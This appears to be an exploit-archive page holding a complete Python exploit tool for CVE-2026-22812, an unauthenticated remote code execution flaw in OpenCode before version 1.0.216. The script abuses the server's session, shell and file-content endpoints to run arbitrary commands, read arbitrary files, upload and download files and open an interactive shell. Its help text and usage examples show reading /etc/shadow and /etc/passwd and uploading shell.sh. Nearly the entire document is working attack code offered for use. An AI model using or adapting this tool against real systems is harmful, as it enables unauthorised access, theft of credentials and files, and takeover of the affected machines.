4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3

import requests
import argparse
import sys
import json
import os
import readline
from urllib.parse import urlparse
from datetime import datetime
from typing import Optional, Dict, Any

import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class Colors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKCYAN = '\033[96m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

class OpenCodeExploit:
    
    def __init__(self, target: str, timeout: int = 10, proxy: str = None):
        self.target = target.rstrip('/')
        self.timeout = timeout
        self.session = requests.Session()
        self.session_id = None
        self.pty_id = None
        
        # Setup session
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
            'Content-Type': 'application/json'
        })
        
        # Setup proxy if provided
        if proxy:
            self.session.proxies = {
                'http': proxy,
                'https': proxy
            }
            
        # Statistics
        self.stats = {
            'commands_executed': 0,
            'files_read': 0,
            'files_written': 0,
            'errors': 0
        }
        
    def log(self, message: str, level: str = "INFO"):
        """Print formatted log messages"""
        colors = {
            "INFO": Colors.OKBLUE,
            "SUCCESS": Colors.OKGREEN,
            "ERROR": Colors.FAIL,
            "WARNING": Colors.WARNING,
            "DEBUG": Colors.OKCYAN
        }
        
        prefixes = {
            "INFO": "[*]",
            "SUCCESS": "[+]",
            "ERROR": "[-]",
            "WARNING": "[!]",
            "DEBUG": "[.]"
        }
        
        color = colors.get(level, "")
        prefix = prefixes.get(level, "[?]")
        
        print(f"{color}{prefix} {message}{Colors.ENDC}")
    
    def verify_target(self) -> bool:
        try:
            self.log(f"Verifying target: {self.target}")
            
            # Try to create session
            session_id = self.create_session()
            if session_id:
                self.log("Target is VULNERABLE!", "SUCCESS")
                return True
            else:
                self.log("Target does not appear vulnerable", "ERROR")
                return False
                
        except Exception as e:
            self.log(f"Target verification failed: {str(e)}", "ERROR")
            return False
    
    def create_session(self) -> Optional[str]:
        try:
            url = f"{self.target}/session"
            self.log(f"Creating session...", "INFO")
            
            response = self.session.post(
                url,
                json={},
                timeout=self.timeout,
                verify=False
            )
            
            if response.status_code == 200:
                try:
                    data = response.json()
                    if 'id' in data:
                        self.session_id = data['id']
                        self.log(f"Session created: {self.session_id}", "SUCCESS")
                        return self.session_id
                except (json.JSONDecodeError, KeyError):
                    pass
                    
            return None
            
        except requests.exceptions.RequestException as e:
            self.log(f"Session creation failed: {str(e)}", "ERROR")
            self.stats['errors'] += 1
            return None
    
    #Execute arbitrary shell command
    def execute_command(self, command: str, silent: bool = False) -> Optional[Dict]:
        if not self.session_id:
            if not self.create_session():
                return None
        
        try:
            if not silent:
                self.log(f"Executing: {command}")
                
            url = f"{self.target}/session/{self.session_id}/shell"
            
            payload = {
                "agent": "build",
                "command": command
            }
            
            response = self.session.post(
                url,
                json=payload,
                timeout=self.timeout,
                verify=False
            )
            
            self.stats['commands_executed'] += 1
            
            if response.status_code in [200, 201, 202]:
                if not silent:
                    self.log("Command executed successfully", "SUCCESS")
                    
                try:
                    return response.json()
                except json.JSONDecodeError:
                    return {"output": response.text}
            else:
                if not silent:
                    self.log(f"Command failed: HTTP {response.status_code}", "ERROR")
                self.stats['errors'] += 1
                return None
                
        except requests.exceptions.RequestException as e:
            if not silent:
                self.log(f"Execution error: {str(e)}", "ERROR")
            self.stats['errors'] += 1
            return None
    
    def create_pty(self) -> Optional[str]:
        try:
            self.log("Creating PTY session...")
            url = f"{self.target}/pty"
            
            response = self.session.post(
                url,
                json={},
                timeout=self.timeout,
                verify=False
            )
            
            if response.status_code in [200, 201]:
                try:
                    data = response.json()
                    if 'id' in data:
                        self.pty_id = data['id']
                        self.log(f"PTY created: {self.pty_id}", "SUCCESS")
                        return self.pty_id
                except:
                    pass
                    
                self.log("PTY created (no ID returned)", "SUCCESS")
                return "default"
                
            self.log(f"PTY creation failed: HTTP {response.status_code}", "ERROR")
            return None
            
        except requests.exceptions.RequestException as e:
            self.log(f"PTY error: {str(e)}", "ERROR")
            return None
    
    #Read arbitrary file from target
    def read_file(self, filepath: str) -> Optional[str]:
        try:
            self.log(f"Reading file: {filepath}")
            url = f"{self.target}/file/content"
            params = {"path": filepath}
            
            response = self.session.get(
                url,
                params=params,
                timeout=self.timeout,
                verify=False
            )
            
            if response.status_code == 200:
                self.stats['files_read'] += 1
                self.log(f"File read successfully ({len(response.text)} bytes)", "SUCCESS")
                return response.text
            else:
                self.log(f"File read failed: HTTP {response.status_code}", "ERROR")
                self.stats['errors'] += 1
                return None
                
        except requests.exceptions.RequestException as e:
            self.log(f"File read error: {str(e)}", "ERROR")
            self.stats['errors'] += 1
            return None
    
    #Write file to target system via command execution
    def write_file(self, filepath: str, content: str) -> bool:
        try:
            self.log(f"Writing file: {filepath}")
            
            import base64
            encoded = base64.b64encode(content.encode()).decode()
            
            command = f"echo {encoded} | base64 -d > {filepath}"
            result = self.execute_command(command, silent=True)
            
            if result:
                verify_cmd = f"test -f {filepath} && echo 'OK'"
                verify = self.execute_command(verify_cmd, silent=True)
                
                if verify and 'OK' in str(verify):
                    self.stats['files_written'] += 1
                    self.log(f"File written successfully", "SUCCESS")
                    return True
                    
            self.log("File write failed", "ERROR")
            return False
            
        except Exception as e:
            self.log(f"File write error: {str(e)}", "ERROR")
            return False
    
    #Upload local file to target
    def upload_file(self, local_path: str, remote_path: str) -> bool:
        try:
            if not os.path.exists(local_path):
                self.log(f"Local file not found: {local_path}", "ERROR")
                return False
                
            self.log(f"Uploading: {local_path} -> {remote_path}")
            
            with open(local_path, 'rb') as f:
                content = f.read()
                
            import base64
            encoded = base64.b64encode(content).decode()
            
            if len(encoded) > 50000:
                self.log("Large file, uploading in chunks...")
                chunk_size = 50000
                chunks = [encoded[i:i+chunk_size] for i in range(0, len(encoded), chunk_size)]
                
                self.execute_command(f"rm -f {remote_path}", silent=True)
                
                for i, chunk in enumerate(chunks):
                    cmd = f"echo {chunk} >> {remote_path}.b64"
                    if not self.execute_command(cmd, silent=True):
                        self.log(f"Upload failed at chunk {i+1}", "ERROR")
                        return False
                        
                decode_cmd = f"base64 -d {remote_path}.b64 > {remote_path} && rm {remote_path}.b64"
                self.execute_command(decode_cmd, silent=True)
            else:
                command = f"echo {encoded} | base64 -d > {remote_path}"
                self.execute_command(command, silent=True)
            
            verify_cmd = f"ls -lh {remote_path}"
            result = self.execute_command(verify_cmd, silent=True)
            
            if result:
                self.log("Upload successful!", "SUCCESS")
                return True
            else:
                self.log("Upload verification failed", "ERROR")
                return False
                
        except Exception as e:
            self.log(f"Upload error: {str(e)}", "ERROR")
            return False
    
    #Download file from target
    def download_file(self, remote_path: str, local_path: str) -> bool:
        try:
            self.log(f"Downloading: {remote_path} -> {local_path}")
            
            content = self.read_file(remote_path)
            if content:
                with open(local_path, 'w') as f:
                    f.write(content)
                    
                self.log(f"Downloaded successfully ({len(content)} bytes)", "SUCCESS")
                return True
            else:
                self.log("Download failed", "ERROR")
                return False
                
        except Exception as e:
            self.log(f"Download error: {str(e)}", "ERROR")
            return False
    
    def get_system_info(self) -> Dict[str, str]:
        self.log("Gathering system information...")
        
        info = {}
        
        commands = {
            'hostname': 'hostname',
            'username': 'whoami',
            'user_id': 'id',
            'current_dir': 'pwd',
            'kernel': 'uname -a',
            'os_release': 'cat /etc/os-release 2>/dev/null | head -5',
            'ip_address': 'ip addr show 2>/dev/null | grep inet | head -5',
            'processes': 'ps aux | head -10'
        }
        
        for key, cmd in commands.items():
            result = self.execute_command(cmd, silent=True)
            if result:
                info[key] = str(result).strip()
                
        return info
        
    #Interactive shell mode
    def interactive_shell(self):
        if not self.session_id:
            if not self.create_session():
                return
        
        print(f"\n{Colors.OKGREEN}{Colors.BOLD}[*] Entering interactive shell mode{Colors.ENDC}")
        print(f"{Colors.WARNING}[!] Type 'help' for commands, 'exit' to quit{Colors.ENDC}\n")
        
        hostname_result = self.execute_command("hostname", silent=True)
        hostname = str(hostname_result).strip() if hostname_result else "target"
        
        username_result = self.execute_command("whoami", silent=True)
        username = str(username_result).strip() if username_result else "user"
        
        while True:
            try:
                prompt = f"{Colors.OKGREEN}{username}@{hostname}{Colors.ENDC}$ "
                cmd = input(prompt).strip()
                
                if not cmd:
                    continue
                
                if cmd.lower() == 'exit':
                    print(f"{Colors.WARNING}[*] Exiting...{Colors.ENDC}")
                    break
                    
                elif cmd.lower() == 'help':
                    self.print_shell_help()
                    continue
                    
                elif cmd.startswith('read '):
                    filepath = cmd[5:].strip()
                    content = self.read_file(filepath)
                    if content:
                        print(content)
                    continue
                    
                elif cmd.startswith('download '):
                    parts = cmd.split()
                    if len(parts) >= 3:
                        self.download_file(parts[1], parts[2])
                    else:
                        print(f"{Colors.FAIL}[-] Usage: download <remote_path> <local_path>{Colors.ENDC}")
                    continue
                    
                elif cmd.startswith('upload '):
                    parts = cmd.split()
                    if len(parts) >= 3:
                        self.upload_file(parts[1], parts[2])
                    else:
                        print(f"{Colors.FAIL}[-] Usage: upload <local_path> <remote_path>{Colors.ENDC}")
                    continue
                    
                elif cmd == 'sysinfo':
                    info = self.get_system_info()
                    print(json.dumps(info, indent=2))
                    continue
                    
                elif cmd == 'stats':
                    self.print_statistics()
                    continue
                    
                elif cmd == 'session':
                    print(f"Session ID: {self.session_id}")
                    continue
                
                result = self.execute_command(cmd, silent=True)
                if result:
                    output = result.get('output') or str(result)
                    if output and output != '{}':
                        print(output)
                        
            except KeyboardInterrupt:
                print(f"\n{Colors.WARNING}[!] Interrupted. Type 'exit' to quit.{Colors.ENDC}")
            except EOFError:
                break
            except Exception as e:
                print(f"{Colors.FAIL}[-] Error: {str(e)}{Colors.ENDC}")
    
    def print_shell_help(self):
        help_text = f"""
{Colors.BOLD}Interactive Shell Commands:{Colors.ENDC}

{Colors.OKCYAN}Special Commands:{Colors.ENDC}
  help                          Show this help
  exit                          Exit interactive shell
  read <file>                   Read file content
  download <remote> <local>     Download file
  upload <local> <remote>       Upload file
  sysinfo                       Gather system information
  stats                         Show exploitation statistics
  session                       Show current session ID

{Colors.OKCYAN}Any other command:{Colors.ENDC}
  Will be executed as a shell command on the target

{Colors.WARNING}Examples:{Colors.ENDC}
  ls -la
  cat /etc/passwd
  read /etc/shadow
  download /etc/hosts ./hosts.txt
  upload shell.sh /tmp/shell.sh
"""
        print(help_text)
    
    def print_statistics(self):
        print(f"\n{Colors.BOLD}Exploitation Statistics:{Colors.ENDC}")
        print(f"  Commands Executed:  {self.stats['commands_executed']}")
        print(f"  Files Read:         {self.stats['files_read']}")
        print(f"  Files Written:      {self.stats['files_written']}")
        print(f"  Errors:             {self.stats['errors']}\n")

def print_banner():
    banner = f"""
{Colors.FAIL}{Colors.BOLD}
╔════════════════════════════════════════════════════════════════╗
║                                                                ║
║         CVE-2026-22812 Exploit Tool v1.0.0                     ║
║         OpenCode Unauthenticated RCE Exploitation              ║
║                                                                ║
║  Target: OpenCode < 1.0.216                                    ║
║  CVSS Score: 8.8 (High)                                        ║
║  Type: Unauthenticated Remote Code Execution                   ║
║                                                                ║
║  Author: @rohmatariow                                          ║
║  GitHub: github.com/rohmatariow/CVE-2026-22812-exploit         ║
║                                                                ║
╚════════════════════════════════════════════════════════════════╝
{Colors.ENDC}
"""
    print(banner)

def main():
    print_banner()
    
    parser = argparse.ArgumentParser(
        description='CVE-2026-22812 Exploitation Tool',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=f"""
{Colors.BOLD}Examples:{Colors.ENDC}
  # Interactive shell
  python3 exploit.py -t http://192.168.1.10:4096 -i
  
  # Execute single command
  python3 exploit.py -t http://192.168.1.10:4096 -c "id"
  
  # Read file
  python3 exploit.py -t http://192.168.1.10:4096 -r /etc/passwd
  
  # Upload file
  python3 exploit.py -t http://192.168.1.10:4096 --upload shell.sh /tmp/shell.sh
  
  # Download file
  python3 exploit.py -t http://192.168.1.10:4096 --download /etc/shadow ./shadow.txt
  
  # Gather system info
  python3 exploit.py -t http://192.168.1.10:4096 --sysinfo
  
  # Use with proxy (Burp)
  python3 exploit.py -t http://target:4096 -c "id" --proxy http://127.0.0.1:8080
        """
    )
    
    parser.add_argument('-t', '--target', required=True,
                       help='Target URL (e.g., http://192.168.1.10:4096)')
    
    action_group = parser.add_mutually_exclusive_group()
    action_group.add_argument('-c', '--command', help='Execute single command')
    action_group.add_argument('-r', '--read', help='Read file')
    action_group.add_argument('-i', '--interactive', action='store_true',
                            help='Interactive shell mode')
    action_group.add_argument('--sysinfo', action='store_true',
                            help='Gather system information')
    action_group.add_argument('--pty', action='store_true',
                            help='Create PTY session')
    
    parser.add_argument('--upload', nargs=2, metavar=('LOCAL', 'REMOTE'),
                       help='Upload file: --upload local.txt /tmp/remote.txt')
    parser.add_argument('--download', nargs=2, metavar=('REMOTE', 'LOCAL'),
                       help='Download file: --download /etc/passwd ./passwd.txt')
    
    parser.add_argument('--timeout', type=int, default=10,
                       help='Request timeout in seconds (default: 10)')
    parser.add_argument('--proxy', help='Proxy URL (e.g., http://127.0.0.1:8080)')
    parser.add_argument('--verify', action='store_true',
                       help='Only verify if target is vulnerable')
    
    args = parser.parse_args()
    
    try:
        exploit = OpenCodeExploit(
            target=args.target,
            timeout=args.timeout,
            proxy=args.proxy
        )
        
        if args.verify or not any([args.command, args.read, args.interactive, 
                                    args.sysinfo, args.pty, args.upload, args.download]):
            if exploit.verify_target():
                print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] Target is VULNERABLE to CVE-2026-22812!{Colors.ENDC}")
                print(f"{Colors.OKGREEN}[+] Session ID: {exploit.session_id}{Colors.ENDC}\n")
                sys.exit(0)
            else:
                print(f"\n{Colors.FAIL}[-] Target does not appear vulnerable{Colors.ENDC}\n")
                sys.exit(1)
        
        if not exploit.create_session():
            print(f"\n{Colors.FAIL}[-] Failed to create session. Target may not be vulnerable.{Colors.ENDC}\n")
            sys.exit(1)
        
        print(f"\n{Colors.OKGREEN}[+] Target is VULNERABLE!{Colors.ENDC}")
        print(f"{Colors.OKGREEN}[+] Session ID: {exploit.session_id}{Colors.ENDC}\n")
        
        if args.interactive:
            exploit.interactive_shell()
            
        elif args.command:
            result = exploit.execute_command(args.command)
            if result:
                output = result.get('output') or json.dumps(result, indent=2)
                print(f"\n{output}\n")
                
        elif args.read:
            content = exploit.read_file(args.read)
            if content:
                print(f"\n{content}\n")
                
        elif args.sysinfo:
            info = exploit.get_system_info()
            print(f"\n{Colors.BOLD}System Information:{Colors.ENDC}")
            print(json.dumps(info, indent=2))
            print()
            
        elif args.pty:
            pty_id = exploit.create_pty()
            if pty_id:
                print(f"\n{Colors.OKGREEN}[+] PTY Session ID: {pty_id}{Colors.ENDC}\n")
                
        elif args.upload:
            exploit.upload_file(args.upload[0], args.upload[1])
            
        elif args.download:
            exploit.download_file(args.download[0], args.download[1])
        
        if exploit.stats['commands_executed'] > 0 or exploit.stats['files_read'] > 0:
            exploit.print_statistics()
            
    except KeyboardInterrupt:
        print(f"\n{Colors.WARNING}[!] Interrupted by user{Colors.ENDC}\n")
        sys.exit(130)
    except Exception as e:
        print(f"\n{Colors.FAIL}[-] Fatal error: {str(e)}{Colors.ENDC}\n")
        sys.exit(1)

if __name__ == "__main__":
    main()